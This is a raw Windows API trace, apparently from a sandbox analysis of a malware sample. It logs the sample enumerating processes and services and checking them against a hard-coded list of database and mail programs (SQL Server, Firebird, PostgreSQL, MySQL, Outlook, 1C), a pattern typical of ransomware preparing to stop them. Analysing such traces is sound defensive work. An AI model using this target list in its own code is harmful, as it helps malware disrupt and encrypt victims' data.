	[0167.189] lstrlenW (lpString="SamSs") returned 5
	[0167.189] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0167.189] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0167.189] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0167.189] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0167.189] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0167.189] lstrlenW (lpString="Schedule") returned 8
	[0167.189] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0167.189] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0167.189] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0167.189] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0167.189] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0167.189] lstrlenW (lpString="SENS") returned 4
	[0167.189] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0167.189] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0167.189] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0167.189] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0167.189] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0167.190] lstrlenW (lpString="ShellHWDetection") returned 16
	[0167.190] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0167.190] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0167.190] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0167.190] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0167.190] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0167.190] lstrlenW (lpString="Spooler") returned 7
	[0167.190] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0167.190] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0167.190] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0167.190] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0167.190] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0167.190] lstrlenW (lpString="SysMain") returned 7
	[0167.190] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0167.190] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0167.190] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0167.190] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0167.190] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0167.190] lstrlenW (lpString="Themes") returned 6
	[0167.190] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0167.190] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0167.190] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0167.190] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0167.190] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0167.190] lstrlenW (lpString="TrkWks") returned 6
	[0167.190] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0167.190] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0167.190] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0167.190] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0167.190] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0167.190] lstrlenW (lpString="UxSms") returned 5
	[0167.190] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0167.190] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0167.190] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0167.190] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0167.191] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0167.191] lstrlenW (lpString="WdiServiceHost") returned 14
	[0167.191] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0167.191] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0167.191] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0167.191] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0167.191] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0167.191] lstrlenW (lpString="WdiSystemHost") returned 13
	[0167.191] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0167.191] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0167.191] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0167.191] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0167.191] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0167.191] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0167.191] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0167.191] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0167.191] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0167.191] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0167.191] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0167.191] lstrlenW (lpString="Winmgmt") returned 7
	[0167.191] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0167.191] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0167.191] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0167.191] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0167.191] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0167.191] lstrlenW (lpString="WPDBusEnum") returned 10
	[0167.191] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0167.191] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0167.191] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0167.191] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0167.191] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0167.191] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7ba6360 | out: hHeap=0x7ab0000) returned 1
	[0167.191] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3d0
	[0167.194] Process32FirstW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0167.194] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0167.194] lstrlenW (lpString="System") returned 6
	[0167.194] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0167.194] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0167.194] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0167.194] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0167.194] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0167.194] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0167.194] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0167.194] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0167.195] lstrlenW (lpString="smss.exe") returned 8
	[0167.195] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0167.195] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0167.195] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0167.195] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0167.195] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0167.195] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0167.195] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0167.195] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0167.195] lstrlenW (lpString="csrss.exe") returned 9
	[0167.195] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0167.195] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0167.195] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0167.195] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0167.195] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0167.195] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0167.195] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0167.195] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0167.196] lstrlenW (lpString="wininit.exe") returned 11
	[0167.196] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0167.196] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0167.196] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0167.196] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0167.196] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0167.196] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0167.196] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0167.196] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0167.196] lstrlenW (lpString="csrss.exe") returned 9
	[0167.196] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0167.196] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0167.196] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0167.196] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0167.196] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0167.196] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0167.197] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0167.197] lstrlenW (lpString="winlogon.exe") returned 12
	[0167.197] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0167.197] lstrlenW (lpString="services.exe") returned 12
	[0167.197] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0167.197] lstrlenW (lpString="lsass.exe") returned 9
	[0167.197] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0167.198] lstrlenW (lpString="lsm.exe") returned 7
	[0167.198] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0167.198] lstrlenW (lpString="svchost.exe") returned 11
	[0167.198] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0167.198] lstrlenW (lpString="svchost.exe") returned 11
	[0167.198] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0167.199] lstrlenW (lpString="svchost.exe") returned 11
	[0167.199] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0167.199] lstrlenW (lpString="svchost.exe") returned 11
	[0167.199] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2d, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0167.199] lstrlenW (lpString="svchost.exe") returned 11
	[0167.199] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0167.200] lstrlenW (lpString="audiodg.exe") returned 11
	[0167.200] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0167.200] lstrlenW (lpString="svchost.exe") returned 11
	[0167.200] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0167.200] lstrlenW (lpString="svchost.exe") returned 11
	[0167.200] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0167.201] lstrlenW (lpString="spoolsv.exe") returned 11
	[0167.201] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0167.201] lstrlenW (lpString="svchost.exe") returned 11
	[0167.201] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0167.201] lstrlenW (lpString="taskhost.exe") returned 12
	[0167.201] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0167.202] lstrlenW (lpString="dwm.exe") returned 7
	[0167.202] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0167.202] lstrlenW (lpString="explorer.exe") returned 12
	[0167.202] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0167.202] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0167.202] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0167.203] lstrlenW (lpString="reader_sl.exe") returned 13
	[0167.203] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="drvinst.exe")) returned 1
	[0167.203] lstrlenW (lpString="drvinst.exe") returned 11
	[0167.203] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0167.203] lstrlenW (lpString="taskhost.exe") returned 12
	[0167.203] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x370, pcPriClassBase=13, dwFlags=0x0, szExeFile="consent.exe")) returned 1
	[0167.204] lstrlenW (lpString="consent.exe") returned 11
	[0167.204] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0167.204] lstrlenW (lpString="dllhost.exe") returned 11
	[0167.204] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0167.204] lstrlenW (lpString="dllhost.exe") returned 11
	[0167.204] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0
	[0167.205] CloseHandle (hObject=0x3d0) returned 1
	[0167.205] Sleep (dwMilliseconds=0x1f4) 
	[0167.701] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb616c60
	[0167.702] EnumServicesStatusExW (in: hSCManager=0xb616c60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0167.702] GetLastError () returned 0xea
	[0167.702] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x11e4) returned 0x7ba6360
	[0167.702] EnumServicesStatusExW (in: hSCManager=0xb616c60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x7ba6360, cbBufSize=0x11e4, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x7ba6360, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0167.703] CloseServiceHandle (hSCObject=0xb616c60) returned 1
	[0167.703] lstrlenW (lpString="Appinfo") returned 7
	[0167.703] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0167.703] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0167.703] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0167.703] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0167.703] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0167.703] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0167.703] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0167.703] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0167.703] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0167.703] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0167.703] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0167.703] lstrlenW (lpString="AudioSrv") returned 8
	[0167.703] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0167.703] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0167.703] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0167.703] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0167.703] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0167.703] lstrlenW (lpString="BFE") returned 3
	[0167.703] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0167.703] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0167.703] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0167.703] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0167.703] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0167.703] lstrlenW (lpString="CryptSvc") returned 8
	[0167.703] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0167.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0167.704] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0167.704] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0167.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0167.704] lstrlenW (lpString="CscService") returned 10
	[0167.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0167.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0167.704] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0167.704] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0167.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0167.704] lstrlenW (lpString="DcomLaunch") returned 10
	[0167.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0167.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0167.704] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0167.704] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0167.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0167.704] lstrlenW (lpString="Dhcp") returned 4
	[0167.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0167.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0167.704] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0167.704] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0167.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0167.704] lstrlenW (lpString="Dnscache") returned 8
	[0167.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
